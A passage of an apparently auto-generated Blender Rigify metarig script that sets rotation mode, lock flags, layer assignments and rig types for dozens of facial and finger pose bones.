pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forehead.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forehead.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['tongue.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_ring.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_middle.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_index.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_pinky.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_ring.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_middle.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_index.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['nose.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['temple.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['temple.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_ring.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_middle.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_index.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_ring.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_middle.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_index.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.L.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.R.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_ring.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_middle.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_index.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_ring.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_middle.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_index.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['chin.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['chin.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.B.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.B.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.B.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.B.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
